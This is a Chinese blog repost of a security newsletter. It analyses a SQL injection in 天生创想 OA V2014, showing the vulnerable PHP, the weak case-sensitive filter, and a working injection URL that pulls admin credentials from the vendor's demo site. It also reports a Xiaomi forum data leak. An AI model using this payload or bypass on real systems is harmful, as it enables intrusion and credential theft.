搜索此博客

2014年5月18日星期日

Fwd: 天生创想OA系统SQL注入漏洞分析+官网演示

---------- 转发的邮件 ----------
发件人:"黑客技术" <hackdig@foxmail.com>
日期:2014年5月19日 下午12:25
主题:天生创想OA系统SQL注入漏洞分析+官网演示
收件人: <sunkeel@gmail.com>
抄送:

本邮件内容由第三方提供,如果您不想继续收到该邮件,可 点此退订
天生创想OA系统SQL注入漏洞分析+官网演示  阅读原文»

天生创想OA V2014

QQ截图20140216153659.jpg



/administrative/mod_conference.php,84-94行处

elseif ($do == 'keys') {



$id = getGP('id','G');

$type = getGP('type','G');

$db->query("update ".DB_TABLEPRE."conference set type='".$type."' where id=".$id." ");
  
$content=$id;

$title='审批会议内容';

get_logadd($id,$content,$title,19,$_USER->id);

show_msg('会议信息审批成功!', 'admin.php?ac='.$ac.'&fileurl='.$fileurl.'');
  


}



$id通过getGP()函数获得,这个函数在/include/function_global.php,293-307行处

//获取$_GET或$_POST值

function getGP($var, $method = 'GP', $type = 'string') {
  
if ($method == 'G' || $method != 'P' && isset($_GET[$var])) {

$gp = &$_GET;

} else {

$gp = &$_POST;

}

if ($type == 'int') {

return isset($gp[$var]) ? intval($gp[$var]) : 0;
  
} elseif ($type == 'array') {

return isset($gp[$var]) ? (array)getsql($gp[$var]) : array();

} else {

return isset($gp[$var]) ? (string)trim(getsql($gp[$var])) : '';

}

  }



可以看出来最后是通过getsql()函数获得,在/include/function_global.php,278-291行处

function getsql($str){

  $str=str_replace('select','',$str);

      $str=str_replace('join','',$str);
  
      $str=str_replace('union','',$str);

      $str=str_replace('where ','',$str);

      $str=str_replace('insert','',$str);

      $str=str_replace('delete','',$str);
  
      $str=str_replace('and ','',$str);

      $str=str_replace('drop','',$str);

      $str=str_replace('create','',$str);

      $str=str_replace('script','',$str);
  
      $str=str_replace('alert','',$str);

  return $str;

}



明显发现过滤的很薄弱,过滤之前没有做大小写转换,只过滤了小写的单词,稍微变换下就可以绕过。

利用方法:登陆一个普通帐户,访问如下页面

http://网站地址/admin.php?ac=conference&fileurl=administrative&do=keys&id=(Select 1 from (Select count(*),concat((Select concat(username,0x3a,password) from po_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&type=2



就可以得到管理员帐号及密码的密文

漏洞证明:

官网演示http://oa.515158.com/

PS:官网将所有表前面加了前缀"p"

QQ截图20140217190117.jpg



QQ截图20140216201739.jpg

修复方案:

过滤函数太薄弱了~~~


黑客技术官网地址:http://www.hackdig.com/

小米论坛被脱裤(数据与官方符合)可能影响小米移动云等敏感信息  阅读原文»

微博地址:http://weibo.com/1898506183/B49HFrvVx

1.jpg



开始没当真,怎么可能、、但后来发现qq群里炸开锅了、、截一些信息吧、、我不想说什么了



貌似是从网盘泄露的、、、

2.jpg



但实际上是这里(国内很知名的社工库论坛、、)

3.png



现有泄露的数据结构来看有以下信息(salt??尼玛啊、、)

4.png





对比下官方数据吧、、、

5.jpg



6.jpg





小米,偶还能说神马??、、

漏洞证明:

等啊等,终于有数据流证明了,大概影响的数据就是这么多了吧、、

微博上说的却是不假啊、、、

流泪改密码去了、、、

7.jpg

修复方案:

解释解释吧


黑客技术官网地址:http://www.hackdig.com/

阅读更多内容

发帖者 时间:

没有评论:

发表评论

订阅: 博文评论 (Atom)